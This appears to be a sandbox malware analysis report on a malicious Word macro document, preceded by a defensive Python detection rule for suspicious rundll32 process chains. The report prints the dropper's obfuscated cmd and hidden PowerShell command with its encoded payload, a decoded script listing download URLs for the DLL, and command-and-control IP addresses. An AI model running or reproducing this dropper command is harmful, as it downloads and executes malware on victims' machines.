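The process chain above is the loader's whole second stage in five hops: powershell.exe starts the 64-bit rundll32.exe on a DLL dropped under the user profile with a throwaway argument (AnyString), that rundll32 re-launches the SysWOW64 copy, the module is then called by ordinal (`,#1`), and each subsequent hop loads a copy of itself from a randomly named SysWOW64 subdirectory under a non-DLL extension (.pjv, .yca, .lsl, .rmq) with a random export name. The Python below is an added detection example, not part of the Joe Sandbox report or its Sigma rule set; it runs rule logic over constructed process-creation records modelled on the command lines shown above. The record fields (`parent_image`, `image`, `command_line`), the list of "script or Office" parent names, the set of expected module extensions and the benign control event are assumptions for this example.

```python
import os
import re
from dataclasses import dataclass

# Module extensions rundll32 is normally asked to load (assumed allow-list for this example).
EXPECTED_MODULE_EXT = {".dll", ".cpl", ".ocx", ".ax", ".drv"}
# Parents from which a rundll32 child is rarely legitimate (assumed list for this example).
SCRIPT_OR_OFFICE_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                          "mshta.exe", "winword.exe", "excel.exe"}

# rundll32[.exe] <module, quoted or bare> [, or whitespace] [<entry point>]
MODULE_RE = re.compile(
    r"""rundll32(?:\.exe)?["']?\s+"""
    r"""(?:"(?P<dq>[^"]+)"|'(?P<sq>[^']+)'|(?P<bare>[^\s,"']+))"""
    r"""(?:(?:\s*,\s*|\s+)(?P<entry>[^\s"']+))?""",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_rundll32(cmdline):
    """Return (module_path, entry_point) from a rundll32 command line, or (None, None)."""
    m = MODULE_RE.search(cmdline)
    if not m:
        return None, None
    return (m.group("dq") or m.group("sq") or m.group("bare")), m.group("entry")


def rundll32_findings(ev):
    """Rule names that fire for one process-creation event (empty list when none)."""
    if basename(ev.image) != "rundll32.exe":
        return []
    hits = []
    parent = basename(ev.parent_image)
    if parent in SCRIPT_OR_OFFICE_HOSTS:
        hits.append("rundll32_spawned_by_script_or_office_host")
    if parent == "rundll32.exe":
        hits.append("rundll32_spawns_rundll32")
    module, entry = parse_rundll32(ev.command_line)
    if module:
        if os.path.splitext(basename(module))[1] not in EXPECTED_MODULE_EXT:
            hits.append("rundll32_module_with_unexpected_extension")
        low = module.lower()
        # Heuristic: user-profile paths or a subdirectory directly under System32/SysWOW64.
        # Legitimate cases (printer drivers, DriverStore) will need allow-listing.
        if "\\users\\" in low or re.search(r"\\sys(?:tem32|wow64)\\[^\\]+\\", low):
            hits.append("rundll32_module_from_unusual_directory")
    if entry and re.fullmatch(r"#\d+", entry):
        hits.append("rundll32_call_by_ordinal")
    return hits


def scan(events):
    """(index, findings) for every event that triggers at least one rule."""
    out = []
    for i, ev in enumerate(events):
        hits = rundll32_findings(ev)
        if hits:
            out.append((i, hits))
    return out


# Constructed events modelled on the chain in this report, plus one benign control.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\rundll32.exe",
              r"'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString"),
    ProcEvent(r"C:\Windows\SysWOW64\rundll32.exe", r"C:\Windows\SysWOW64\rundll32.exe",
              r"C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1"),
    ProcEvent(r"C:\Windows\SysWOW64\rundll32.exe", r"C:\Windows\SysWOW64\rundll32.exe",
              r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv',NRUAmATPeNJ"),
    # Benign control (constructed): a Control Panel applet opened from Explorer.
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
              r"C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL C:\Windows\System32\timedate.cpl"),
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx].command_line, hits)
```

The ordinal and extension rules alone would catch every SysWOW64 hop in this report; the parent-process rules are what catch the first hop, where the module is still a plain .dll. Tune the directory heuristic against your own baseline before alerting on it.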
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2097930376.000000001B390000.00000002.00000001.sdmp
Source: PO# 01222021.doc Initial sample: OLE summary subject = Steel Cambridgeshire productivity orchestration Handmade Soft Gloves program Regional Gorgeous quantify payment RSS

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: PO# 01222021.doc Stream path 'Macros/VBA/Dulz0g2a3qqdjsty7' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Dulz0g2a3qqdjsty7 Name: Dulz0g2a3qqdjsty7
Document contains an embedded VBA with many randomly named variables
Source: PO# 01222021.doc Stream path 'Macros/VBA/Dulz0g2a3qqdjsty7' : High entropy of concatenated variable names
Document contains an embedded VBA with many string operations indicating source code obfuscation
Source: PO# 01222021.doc Stream path 'Macros/VBA/Dulz0g2a3qqdjsty7' : High number of string operations
Source: VBA code instrumentation OLE, VBA macro, High number of string operations: Module Dulz0g2a3qqdjsty7 Name: Dulz0g2a3qqdjsty7
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcA
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc … (encoded argument elided here; it is the same UTF-16LE base64 script shown under "Obfuscated command line found" above)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc … (same encoded argument as above) Jump to behavior
PE file contains an invalid checksum
Source: E6_R.dll.5.dr Static PE information: real checksum: 0x5c618 should be: 0x609ad
PE file contains sections with non-standard names
Source: E6_R.dll.5.dr Static PE information: section name: .text4
Source: E6_R.dll.5.dr Static PE information: section name: .text8
Source: E6_R.dll.5.dr Static PE information: section name: .text7
Source: E6_R.dll.5.dr Static PE information: section name: .text6
Source: E6_R.dll.5.dr Static PE information: section name: .text5
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0016FED0 push edx; ret 7_2_0016FFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00151155 push ecx; ret 7_2_00151156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001521EC pushad ; ret 7_2_00152200
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00153391 push eax; iretd 7_2_001533AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00150C18 pushfd ; retf 7_2_00150C19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001517A1 push ds; iretd 7_2_001517A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0018FED0 push edx; ret 8_2_0018FFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00171155 push ecx; ret 8_2_00171156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001721EC pushad ; ret 8_2_00172200
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00173391 push eax; iretd 8_2_001733AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00170C18 pushfd ; retf 8_2_00170C19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001717A1 push ds; iretd 8_2_001717A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EFED0 push edx; ret 9_2_001EFFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D1155 push ecx; ret 9_2_001D1156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D21EC pushad ; ret 9_2_001D2200
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D3391 push eax; iretd 9_2_001D33AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D0C18 pushfd ; retf 9_2_001D0C19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D17A1 push ds; iretd 9_2_001D17A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001AFED0 push edx; ret 10_2_001AFFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00191155 push ecx; ret 10_2_00191156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001921EC pushad ; ret 10_2_00192200
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00193391 push eax; iretd 10_2_001933AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00190C18 pushfd ; retf 10_2_00190C19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001917A1 push ds; iretd 10_2_001917A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001DFED0 push edx; ret 11_2_001DFFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C1155 push ecx; ret 11_2_001C1156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C21EC pushad ; ret 11_2_001C2200
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C3391 push eax; iretd 11_2_001C33AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C0C18 pushfd ; retf 11_2_001C0C19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C17A1 push ds; iretd 11_2_001C17A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019FED0 push edx; ret 12_2_0019FFD4

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Bpqpm\gwvn.lsl:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Upjyf\ffrm.rmq:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX (57 identical events) Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX (6 identical events) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (54 identical events) Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX (18 identical events) Jump to behavior

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2312 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000005.00000002.2091542862.00000000003F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000A823 mov eax, dword ptr fs:[00000030h] 7_2_1000A823
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page execute read | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 195.159.28.230 144
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 69.38.130.14 80
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded Sv PB5o ([TYpE]("{2}{1}{5}{3}{0}{6}{4}" -F 'T','EM.I','SYsT','eC','y','o.DIR','OR') ) ; SEt-ITEm vARIaBLe:m7a9 ([typE]("{4}{2}{3}{5}{1}{6}{0}{7}" -f'n','ICEpOINtm','neT','.','sySteM.','sERv','A','aGer') ) ; $Ihv89_g=$M91G + [char](33) + $H23D;$D94M=(('P7'+'2')+'X'); (gET-variaBle pb5o -VA)::"crEaTedi`ReCt`oRY"($HOME + ((('9k'+'tNk')+'2'+'d'+('uhb9'+'kt'+'Gxlh')+('9i'+'a9kt'))."rE`PlaCe"(('9'+'kt'),'\')));$J87H=('S'+('36'+'N')); ( vaRIable M7a9 -VA )::"SEcuriTYp`RoToC`oL" = (('Tl'+'s')+'12');$X22U=('E'+('_'+'_E'));$P27pqe3 = ('E6'+'_R');$F39L=(('Q'+'94')+'W');$Ad1ra8n=$HOME+((('Ki'+'m')+('Nk2d'+'uhb')+'Ki'+'m'+('Gx'+'l')+'h9'+('i'+'aKi')+'m')-RePlace([CHAR]75+[CHAR]105+[CHAR]109),[CHAR]92)+$P27pqe3+'.d' + 'll';$V28U=('C8'+'8K');$Mriqd59='h' + 'tt' + 'p';$Kw3794x=('x '+'['+(' sh'+' ')+('b'+'://cab.my'+'kf')+'n.'+('com'+'/')+'a'+('d'+'min')+'/'+('X/'+'!')+'x'+(' '+'[ s')+'h'+(' b'+':')+('/'+'/bha')+'k'+'ti'+('vrind'+'.'+'com/c')+'g'+('i'+'-bin')+('/'+'JBbb'+'8'+'/!x [ ')+'sh'+(' b'+':')+('/'+'/van'+'ddna')+('bharg'+'a')+'ve'+('.c'+'o')+('m/ass'+'et')+'/W'+('9o'+'/')+'!'+'x '+'[ '+('s'+'h ')+('b:'+'/')+('/ie-'+'b'+'e')+('s'+'t.n')+'e'+('t/o'+'n'+'lin')+'e'+('-'+'timer'+'-')+('k'+'vh')+('xz'+'/i')+'l'+('X'+'L/!x')+(' [ s'+'h ')+('b:'+'/')+'/'+'g'+('oc'+'p'+'hon')+('gth'+'e')+('.com/'+'wp'+'-')+'co'+'nt'+('ent/'+'l')+'M'+('MC'+'/!')+('x '+'[ s')+('h'+' b://'+'ww')+'w'+('.l'+'e')+('t'+'sc')+'om'+'pa'+('r'+'eon')+('l'+'in')+('e'+'.c')+('om/d'+'e')+('.l'+'et')+'sc'+'
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded Sv PB5o ([TYpE]("{2}{1}{5}{3}{0}{6}{4}" -F 'T','EM.I','SYsT','eC','y','o.DIR','OR') ) ; SEt-ITEm vARIaBLe:m7a9 ([typE]("{4}{2}{3}{5}{1}{6}{0}{7}" -f'n','ICEpOINtm','neT','.','sySteM.','sERv','A','aGer') ) ; $Ihv89_g=$M91G + [char](33) + $H23D;$D94M=(('P7'+'2')+'X'); (gET-variaBle pb5o -VA)::"crEaTedi`ReCt`oRY"($HOME + ((('9k'+'tNk')+'2'+'d'+('uhb9'+'kt'+'Gxlh')+('9i'+'a9kt'))."rE`PlaCe"(('9'+'kt'),'\')));$J87H=('S'+('36'+'N')); ( vaRIable M7a9 -VA )::"SEcuriTYp`RoToC`oL" = (('Tl'+'s')+'12');$X22U=('E'+('_'+'_E'));$P27pqe3 = ('E6'+'_R');$F39L=(('Q'+'94')+'W');$Ad1ra8n=$HOME+((('Ki'+'m')+('Nk2d'+'uhb')+'Ki'+'m'+('Gx'+'l')+'h9'+('i'+'aKi')+'m')-RePlace([CHAR]75+[CHAR]105+[CHAR]109),[CHAR]92)+$P27pqe3+'.d' + 'll';$V28U=('C8'+'8K');$Mriqd59='h' + 'tt' + 'p';$Kw3794x=('x '+'['+(' sh'+' ')+('b'+'://cab.my'+'kf')+'n.'+('com'+'/')+'a'+('d'+'min')+'/'+('X/'+'!')+'x'+(' '+'[ s')+'h'+(' b'+':')+('/'+'/bha')+'k'+'ti'+('vrind'+'.'+'com/c')+'g'+('i'+'-bin')+('/'+'JBbb'+'8'+'/!x [ ')+'sh'+(' b'+':')+('/'+'/van'+'ddna')+('bharg'+'a')+'ve'+('.c'+'o')+('m/ass'+'et')+'/W'+('9o'+'/')+'!'+'x '+'[ '+('s'+'h ')+('b:'+'/')+('/ie-'+'b'+'e')+('s'+'t.n')+'e'+('t/o'+'n'+'lin')+'e'+('-'+'timer'+'-')+('k'+'vh')+('xz'+'/i')+'l'+('X'+'L/!x')+(' [ s'+'h ')+('b:'+'/')+'/'+'g'+('oc'+'p'+'hon')+('gth'+'e')+('.com/'+'wp'+'-')+'co'+'nt'+('ent/'+'l')+'M'+('MC'+'/!')+('x '+'[ s')+('h'+' b://'+'ww')+'w'+('.l'+'e')+('t'+'sc')+'om'+'pa'+('r'+'eon')+('l'+'in')+('e'+'.c')+('om/d'+'e')+('.l'+'et')+'sc'+' Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv',NRUAmATPeNJ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca',VDZITWzoE
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpqpm\gwvn.lsl',KCoulWayDpJU
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpqpm\gwvn.lsl',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Upjyf\ffrm.rmq',iFoslrVsudBDI
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Upjyf\ffrm.rmq',#1
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc [base64-encoded command omitted; its decoded form is listed under "Encrypted powershell cmdline option found"]
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc [base64-encoded command omitted; its decoded form is listed under "Encrypted powershell cmdline option found"]

Language, Device and Operating System Detection:

